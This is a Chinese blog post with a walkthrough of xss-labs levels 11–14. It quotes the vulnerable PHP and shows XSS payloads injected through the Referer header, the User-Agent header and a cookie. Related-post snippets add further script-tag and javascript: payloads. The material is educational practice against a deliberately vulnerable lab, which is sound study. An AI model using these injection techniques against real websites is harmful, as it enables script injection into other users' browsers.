xss-lab的level11-level14

最新推荐文章于 2024-07-02 08:55:42 发布
最新推荐文章于 2024-07-02 08:55:42 发布
阅读量233 收藏
点赞数 1
分类专栏: web安全学习 文章标签: javascript xss 网络安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64775230/article/details/139724746
版权

level11:
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);

<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">

?t_ref=" οnfοcus=javascript:alert() type="text'
οnfοcus=javascript:alert() type="text ' " 
但是t_ref参数接收的是HTTP_REFERER请求头,所以这道题应该是在这里存在漏洞点
但是要注意的是大于号是被删除了

尝试抓包
如果在url提交,那么抓包也抓不到数据
所以真正的做法是:因为t_ref直接接收refer,所以直接构造referer
" οnfοcus=javascript:alert() type="text把这个填在referer里即可


level12:
<input name="t_ua"  value="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0" type="hidden">
发现这一行很特殊的代码
value里的是UA头
所以我猜测注入点是UA头
直接用hackbar提交ua即可
" οnfοcus=javascript:alert() type="text


level13:
<input name="t_cook"  value="call me maybe?" type="hidden">
这一行特殊的代码。value的值为call me maybe?
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);

查看了一下源代码,发现接收的是用户的cookie
而且大于号是被删掉了,但是可以使用伪协议
user=" οnfοcus=javascript:alert() type="text

level14:
在点击a标签后再url中发现src参数
但是没啥用
然后f12查看源代码发现代码很少,感觉只有这个有用
<iframe name="leftframe" marginwidth=10 marginheight=10 src="http://www.exifviewer.org/" frameborder=no width="80%" scrolling="no" height=80%></iframe>
但是为啥这个网站打不开,反正感觉是跳转到这个网站然后再xss

李妍.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
xss-labs通关详解 Level 11-15
qq_41755084的博客
10-26 1206
这一关比上一关多了一个标签,其他没有变化,先试一下上一关的注入语句。发现在t_sort的标签中的"被编码成了html实体字符,没办法正常闭合了。而t_ref的值看起来像是请求的referer头。那我们将上一关的代码从referer头处传入。页面中出现了输入框,点击该输入框,弹窗成功。
xss-lab通关之路
黑白的博客
10-12 4217
xss-lab通关之路
XSSxss-labs-level14
Hugu
02-24 1270
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页或请求该网页中的内容之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码
XSS攻击-xss-lab(1-18)详细讲解
wrypot的博客
03-29 1469
发现单引号前面的内容被赋值给了value,也就是说单引号是value的闭合字符,构造语句开头一个单引号,后面加一个空格(input标签里面属性直接用空格隔开)所以我们接下来要做得事情是,首先&参数t_sort,然后用双引号闭合value值,接着将type类型从hidden隐藏改为text文本,再用onfocus事件触发js语句,最后别忘了,因为我们用双引号闭合了value,所以value本身有的一个双引号多出来了,我们在onfocus="javascript:alert(123)
XSS-lab通关记录
zjnu_y3s的博客
04-11 2123
本文章为buuctf basic XSS-lab的通关记录,为个人学习记录,仅供参考 在学习xss-lab之前,先了解了一下xss攻击的原理,如下: 简述 人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSS。 跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则.
XSS-LabXSS注入笔记1-16)
小谢的博客
10-29 4916
XSS-LabXSS注入笔记1-16)
XSSxss-labs-level5
Hugu
02-23 415
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该网页或请求该网页中的内容之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS
XSS学习 xss-Lab题解
qq_61768489的博客
02-12 2358
level 1 没有任何防护,直接url传xss name=<script>alert(1)</script> level2 有个input标签,尝试用"> 闭合标签 (在网页源代码中,我们输入的数据,是在表单中的value属性内,所以需要先闭合input标签,然后在注入代码,闭合标签) "><script>alert(1)</script> level 3 测试发现尖括号被转换字...
xss-labs/level17
m0_71299382的博客
11-30 243
xss-labs/level17
xss-lab全通关教程
05-07
XSS-lab的20个关卡中,你将依次接触这些类型,并学习如何构造有效的XSS payload,以及如何利用各种过滤和转义机制来绕过防护。例如,你可能会遇到如何在URL参数、表单提交或者cookies中隐藏和传递XSS payload的...
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-lab靶场资源包
07-27
通过使用XSS-Lab靶场资源包,安全从业者和爱好者可以模拟真实环境下的攻击场景,提高对XSS漏洞的识别能力和防御能力,这对于保障网络应用的安全至关重要。在实践中学习和理解这些知识,有助于提升网络安全专业素养,...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
JavaScript检查对象是否包含某个属性
徐三岁的博客
06-28 886
当使用 Object.prototype.hasOwnProperty.call 时,实际上是在调用 hasOwnProperty 方法,并明确指定 this 的值,这使得可以检查任何对象是否拥有指定的属性。使用 Object.prototype.hasOwnProperty.call 的好处是,它允许将 hasOwnProperty 方法作为一个函数传递给其他函数,或者在不直接引用对象的情况下使用它。hasOwnProperty 方法会检查对象自身是否具有指定的属性,而不考虑原型链。
【vueUse库Component模块各函数简介及使用方法--上篇】
最新发布
xiejunlan的博客
07-02 1054
vueUseComponent函数理解 `computedInject` 的概念模拟 `computedInject`使用场景总结构想`createReusableTemplate`的用途可能的实现方式方法一:使用高阶组件(HOC)方法二:使用插槽(Slots)和默认插槽内容结论构想`createTemplatePromise`的用途可能的实现方式使用Vue 3的异步组件构想中的`createTemplatePromise`结论使用Vue的`ref`属性在模板中引用元素或组件示例:引用模板中的DOM元素。
uniApp vue2 vue3配置代理
小白变怪兽
06-28 376
【代码】uniApp vue2 vue3配置代理。
Nuxt 应用的三种运行模式(五)
qq_35876316的博客
06-26 551
SPA 模式是最常见的 Web 应用模式,整个应用在加载完成后,用户的操作不会引发页面跳转,而是通过 JavaScript 动态更新页面内容。
XSS-Lab第十关
07-27
XSS-Lab的第十关是一个注入漏洞的挑战。根据引用\[2\],XSS-Lab是一个用于学习XSS注入的平台,每一关都有不同的XSS注入漏洞。在第十关中,与上一关不同的是会加入地址的检查。具体来说,该关会检查输入的数据中是否包含"http://"字段。因此,为了通过这一关,我们需要在输入的字段中加入该字段,例如输入"java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert('http://')"。这样,当受害者访问该页面时,恶意代码会在其浏览器上执行,从而成功通过第十关。 #### 引用[.reference_title] - *1* *2* *3* [XSS攻击-xss-lab(1-10)详细讲解](https://blog.csdn.net/qq_43395215/article/details/105955004)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值